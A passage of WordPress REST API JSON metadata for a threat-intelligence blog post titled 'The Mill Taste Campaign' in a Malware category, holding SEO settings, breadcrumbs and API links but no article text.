22:41:07","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"open_ai":"{\"title\":{\"suggestions\":[],\"usage\":0},\"description\":{\"suggestions\":[],\"usage\":0}}","ai":null,"created":"2021-08-07 21:55:02","updated":"2025-08-25 22:41:07"},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\" title=\"Home\">Home<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/\" title=\"Posts\">Posts<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/\" title=\"COTH\">COTH<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/\" title=\"Malware\">Malware<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\tThe \u201cMill Taste\u201d Campaign\n<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/cyberthreatintelligencenetwork.com"},{"label":"Posts","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/"},{"label":"COTH","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/"},{"label":"Malware","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/"},{"label":"The &#8220;Mill Taste&#8221; 
Campaign","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/"}],"amp_enabled":false,"_links":{"self":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/comments?post=341"}],"version-history":[{"count":7,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341\/revisions"}],"predecessor-version":[{"id":4428,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341\/revisions\/4428"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/media\/4265"}],"wp:attachment":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/media?parent=341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/categories?post=341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/tags?post=341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}